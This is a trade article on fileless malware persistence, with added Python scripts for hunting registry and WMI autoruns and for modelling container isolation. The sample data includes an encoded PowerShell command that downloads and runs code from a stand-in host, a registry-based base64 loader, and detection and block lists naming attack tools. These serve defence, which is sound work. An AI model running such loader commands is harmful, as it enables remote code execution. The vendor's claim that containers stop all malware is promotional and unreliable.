Defending against fileless malware

Cyber attackers are aware of the difficulties defenders have in fighting the phenomenon of fileless malware, and are concentrating much of their efforts on further developing this type of attack. Fileless attacks increased significantly throughout 2016 and are still on the rise.

Understanding fileless malware

To start, “fileless malware” is a bit of a misnomer, since it’s not always completely fileless. Various other names have been suggested, including “bodiless malware,” “non-malware attacks,” advanced volatile threats (AVTs) and “living off the land” attacks. However, fileless malware seems to have become the accepted term, so we’ll stick with that.

Fileless malware is not unique in how it gains its foothold on endpoints. As with conventional malware, possible entry vectors include email attachments such as Office files with macros, malicious websites with Flash or streaming video, and other file-based or fileless data entering computers.


Fileless malware is also not unique in its methods of attack or the effects of attack, which like conventional malware can include destruction of valuable resources, installation of spyware that steals sensitive information, or planting ransomware that encrypts and blocks access to important information.

What characterises fileless malware and makes it different from conventional malware is that it doesn’t include any of its own malicious files, executable or otherwise, to be saved on infected endpoints.

Instead, it exists primarily as code running in computer memory (RAM). The malicious code is injected into and run by various combinations of legitimate processes such as Windows PowerShell, JavaScript, WMI, Meterpreter, Mimikatz and other administrative and generally non-malicious software. And if the initial foothold was gained with something saved to disk, once the malware is running it can delete anything incriminating. Since standard anti-malware endpoint security products work by scanning endpoint file systems and processes, there’s nothing distinctive to be found and identified as malware.

Fileless malware has existed for almost 20 years, but until recently had one significant built-in weakness: since nothing was saved to disk, the code was easily removed by a simple reboot. However, beginning in 2014 attackers have been developing sophisticated methods for achieving fileless malware persistence. These include:

Windows registry: The malware saves one or more registry keys that upon boot start legitimate services running malicious code. The registry keys are of course themselves saved to disk, but the code is well hidden in legitimate-seeming contexts, may be in randomised addresses, and may be encrypted.


WMI (Windows Management Instrumentation): The malware saves malicious code to WMI’s CIM repository that upon boot starts legitimate services with malicious code. The CIM repository is itself saved to disk, but the code is well hidden.

Reinfection: The malware propagates across servers with high uptime, so that after reboot a server is likely to be reinfected.
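The registry and WMI persistence methods above both leave something on disk, just not a conventional executable, which is what a defender can hunt for. The following script is an added example, not code from the article or from BUFFERZONE: it inspects autorun values and WMI command-line consumers for the hallmarks of a script-based in-memory loader (an encoded PowerShell command, an in-script download, base64 decoding, a hidden window). It runs over constructed sample records; the indicator patterns, the record layout and the sample values are assumptions made for the illustration, and on a real endpoint the same records would be collected from the `CurrentVersion\Run` keys and the `root\subscription` namespace.

```python
"""Hunt for fileless persistence in autorun registry values and WMI permanent
event consumers. Added example, not code from the article or from BUFFERZONE:
it runs over constructed sample records instead of a live host. On a real
Windows endpoint the same records would be read from the Run keys under
HKLM/HKCU ...\\CurrentVersion\\Run and from the CommandLineEventConsumer
instances in the root\\subscription WMI namespace."""
import base64
import re
from dataclasses import dataclass, field

# Patterns that mark script-based, in-memory loaders. Assumed indicator set for
# this example, not an exhaustive or vendor-maintained signature list.
INDICATOR_PATTERNS = {
    "invoke-expression": r"\biex\b|invoke-expression",
    "web download from script": r"downloadstring|downloadfile|net\.webclient",
    "base64 decode in script": r"frombase64string",
    "hidden window": r"-w(?:indowstyle)?\s+hidden",
    "script host launch": r"\bmshta\b|wscript\.shell",
}

# PowerShell's -EncodedCommand (and its abbreviations) followed by the base64 blob.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class Finding:
    source: str            # "registry-run" or "wmi-consumer"
    name: str              # value name or consumer name
    reasons: list = field(default_factory=list)
    decoded: str = ""      # payload recovered from -EncodedCommand, if any


def decode_encoded_command(cmd):
    """Return the UTF-16LE text hidden behind -EncodedCommand, or '' if none."""
    m = ENC_RE.search(cmd)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def inspect_command(source, name, cmd):
    """Score one command line; returns a Finding, or None if nothing stands out."""
    decoded = decode_encoded_command(cmd)
    text = (cmd + " " + decoded).lower()
    reasons = [label for label, pat in INDICATOR_PATTERNS.items() if re.search(pat, text)]
    if decoded:
        reasons.append("encoded powershell command")
    return Finding(source, name, reasons, decoded) if reasons else None


def hunt(run_values, wmi_consumers):
    """run_values: {value_name: command}; wmi_consumers: [{Name, CommandLineTemplate}]."""
    findings = []
    for name, cmd in run_values.items():
        f = inspect_command("registry-run", name, cmd)
        if f:
            findings.append(f)
    for consumer in wmi_consumers:
        f = inspect_command("wmi-consumer", consumer["Name"], consumer["CommandLineTemplate"])
        if f:
            findings.append(f)
    return findings


def constructed_samples():
    """Constructed records for the demonstration; not taken from any real host."""
    staged = "IEX ((New-Object Net.WebClient).DownloadString('http://example.invalid/stage'))"
    encoded = base64.b64encode(staged.encode("utf-16le")).decode("ascii")
    run_values = {
        "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
        "Updater": "powershell.exe -NoP -W Hidden -EncodedCommand " + encoded,
    }
    wmi_consumers = [
        {"Name": "InventoryReport", "CommandLineTemplate": r"C:\Tools\inventory.exe --report"},
        {"Name": "Maint", "CommandLineTemplate":
            r'powershell.exe -NonInteractive -W Hidden -C "IEX ([Text.Encoding]::Unicode.GetString('
            r'[Convert]::FromBase64String((Get-ItemProperty HKLM:\SOFTWARE\Example).Blob)))"'},
    ]
    return run_values, wmi_consumers


if __name__ == "__main__":
    for f in hunt(*constructed_samples()):
        print(f"[{f.source}] {f.name}: {', '.join(f.reasons)}")
        if f.decoded:
            print("    decoded:", f.decoded)
```

The two benign records (a cloud-sync client and an inventory tool) produce no finding; the two persistence records are flagged, and for the Run value the script also recovers the plain-text command behind `-EncodedCommand`, which is what an analyst needs in order to see that the payload is fetched over the network rather than read from a file.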

In many cases, sophisticated attackers take existing conventional malware and create new, fileless variants. Thanks to these methods, organisations are now faced with persistent, fileless malware, capable of a variety of attack types, that conventional security solutions cannot intercept and remove. Some notable recent examples include Powerliks, Kovter, Duqu 2.0, POSHSPY and WMIGhost.

Defence options

Once a fileless attack is known to exist, forensic analysts can use sophisticated tools to track and remove malicious code. However, it is almost impossible for conventional automated solutions to find and identify fileless malware.

Some cyber security companies are attempting to apply behavioural and statistical analysis to identify malicious behaviour rather than the malicious code itself. It is not clear whether in fact attack behaviour can be reliably differentiated from legitimate behaviour; in any case, this approach is still limited in its ability to anticipate new attack vectors.


Far more effective would be a container-based solution – creating a virtual wall between systems and threats that cannot be easily compromised (unlike sandboxes, which are often vulnerable to zero-day threats).

A container-based defence installed on organisational endpoints would identify all processes that can access external, untrusted sources such as the internet. Those processes are kept in the container, along with any data they download or save, including registry settings. At the same time, only uncontained processes can access trusted organisational resources.

For example, a browser session that tries to access a malicious site would stay in contained memory, and a malicious email attachment would be opened in contained memory. The container would prevent many types of potentially dangerous administrative commands from running, such as WMI and PowerShell networking commands; and even in the unlikely event that some malicious code manages to run in the container, the container is periodically wiped along with any registry settings saved to the container’s virtual copy of the registry.


Under this system, contained processes also use separate networks, enforced by the organisational proxy, eliminating the possibility of propagation through the organisation. As threats grow, endpoints become more vulnerable – the most vulnerable part of an organisation. And the rise of fileless malware will make those threats even more acute: how can you fight an entity you can’t even see?
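The container model described in the last three paragraphs rests on a small number of rules: a process that touches an untrusted source becomes contained, a contained process cannot reach trusted resources or launch the blocked administrative tools, and everything a contained process persists lands in an overlay that is periodically wiped. The following is an added example, not BUFFERZONE's code or any real container implementation: it models those rules in plain Python so that the effect on a registry-based persistence attempt can be traced end to end. The class names, the blocked tool list and the scenario are assumptions made for the illustration.

```python
"""Model of the endpoint container policy described in the article. Added
example, not BUFFERZONE's code or a real container: it expresses the stated
rules as plain Python so their effect on a fileless persistence attempt can be
traced. Class names, zone labels and the blocked tool list are assumptions."""
from dataclasses import dataclass, field

TRUSTED_ZONE = "trusted"          # file shares, internal apps, the real registry
UNTRUSTED_ZONE = "untrusted"      # internet, email attachments

# Administrative tool families the container refuses to launch. The article
# names WMI and PowerShell networking commands; this list is an assumption.
BLOCKED_IN_CONTAINER = ("wmic", "powershell", "bitsadmin", "certutil")


class PolicyViolation(Exception):
    """Raised when a contained process breaks one of the container rules."""


@dataclass
class Registry:
    """The real registry plus a per-container overlay that absorbs contained writes."""
    base: dict = field(default_factory=dict)
    overlay: dict = field(default_factory=dict)

    def write(self, key, value, contained):
        (self.overlay if contained else self.base)[key] = value

    def read(self, key, contained):
        if contained and key in self.overlay:   # contained view: overlay wins
            return self.overlay[key]
        return self.base.get(key)

    def wipe_container(self):
        """Periodic wipe: everything a contained process persisted disappears."""
        self.overlay.clear()


@dataclass
class Process:
    name: str
    contained: bool        # True once the process has touched an untrusted source


@dataclass
class Endpoint:
    registry: Registry = field(default_factory=Registry)

    def open_resource(self, proc, zone):
        """Rules 1 and 2: untrusted access forces containment, and a contained
        process never reaches trusted resources."""
        if zone == UNTRUSTED_ZONE:
            proc.contained = True
        elif zone == TRUSTED_ZONE and proc.contained:
            raise PolicyViolation(f"{proc.name} is contained; trusted access denied")

    def run_admin_command(self, proc, command):
        """Rule 3: contained processes may not spawn the blocked tool families."""
        tool = command.split()[0].lower().removesuffix(".exe")
        if proc.contained and tool in BLOCKED_IN_CONTAINER:
            raise PolicyViolation(f"{tool} blocked inside the container")
        return True

    def reboot_autoruns(self):
        """What would start on the next boot: only Run keys in the real registry."""
        return [k for k in self.registry.base if k.startswith("Run\\")]


def persistence_attempt():
    """Trace: a browser touches the internet, code it pulled in writes a Run key,
    the periodic wipe runs, and the key never reaches the real registry."""
    ep = Endpoint()
    browser = Process("browser", contained=False)
    ep.open_resource(browser, UNTRUSTED_ZONE)
    # The write goes to the overlay because the browser is now contained.
    ep.registry.write(r"Run\Updater", "powershell -enc ...", contained=browser.contained)
    seen_before_wipe = ep.registry.read(r"Run\Updater", contained=True) is not None
    ep.registry.wipe_container()
    return {
        "contained": browser.contained,
        "persisted_in_container": seen_before_wipe,
        "autoruns_after_wipe": ep.reboot_autoruns(),
        "survives_on_real_registry": ep.registry.read(r"Run\Updater", contained=False),
    }


if __name__ == "__main__":
    for key, value in persistence_attempt().items():
        print(f"{key}: {value}")
```

The trace shows the property the article relies on: the Run key is visible to the contained process until the wipe, so the malicious code "works" from its own point of view, but it never exists in the real registry and therefore never appears in the autorun list at the next boot. The same overlay idea applies to the container's network separation, which the model leaves out.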

Virtual containers are the answer; and by using them, it won’t matter what kind of malware endpoints may become infected with – file-based, fileless, or some new kind that we haven’t seen yet. Anything that comes into contact with untrusted sources is isolated from anything important, and periodically wiped clean.


Sourced by Israel Levy, CEO of BUFFERZONE




Nick Ismail

Nick Ismail is a former editor for Information Age (from 2018 to 2022) before moving on to become Global Head of Brand Journalism at HCLTech. He has a particular interest in smart technologies, AI and...
